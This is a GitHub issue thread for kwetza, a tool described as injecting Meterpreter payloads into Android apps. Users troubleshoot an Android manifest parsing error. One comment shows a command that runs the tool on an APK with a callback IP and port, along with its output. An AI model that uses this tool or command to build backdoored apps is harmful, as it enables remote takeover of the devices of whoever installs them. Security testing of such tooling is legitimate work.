sensepost / kwetza

Python script to inject existing Android applications with a Meterpreter payload.
GNU General Public License v2.0
629 stars 238 forks source link

Parse Android Manifest errror #23

Open shivsah opened 6 years ago

shivsah commented 6 years ago

screenshot

aswinmprabhu commented 6 years ago

Having the same issue.. Edit - Fixed it by using a smaller apk name

brompwnie commented 6 years ago

Thanks for raising this, I'm going to label this a bug as well. Happy hacking!

Josue198s commented 6 years ago

I still get the bug above and this one below.

python kwetza.py Appslist.apk tpc 192.168.1.10 5050 no

                                       _                  _              ___    ___  
                                      | |                | |            |__ \  / _ \ 

| | __| | ) || | | | | ' _ \| '_ | ' _ \| '_ \ | |/ /\ \ /\ / / \ | / ` | / / | | | | | | | | | | | | | | | | | | | | | | | | | | < \ V V / / | / / (| | / / | || | || || ||| || ||| || ||| || || ||_\ _/\/ _|_/_,| |_()_/

[] DECOMPILING TARGET APK [+] ENDPOINT IP: 192.168.1.10 [+] ENDPOINT PORT: 5050 [+] APKTOOL DECOMPILED SUCCESS [] BYTING TCP COMMS [*] ANALYZING ANDROID MANIFEST [DEBUG] Attempting to find MAIN [+] NO LAUNCHER FOUND, PLEASE SPECIFY A TARGET CLASS

CYB3RK1D commented 5 years ago

just put the apk file in the kwetza folder.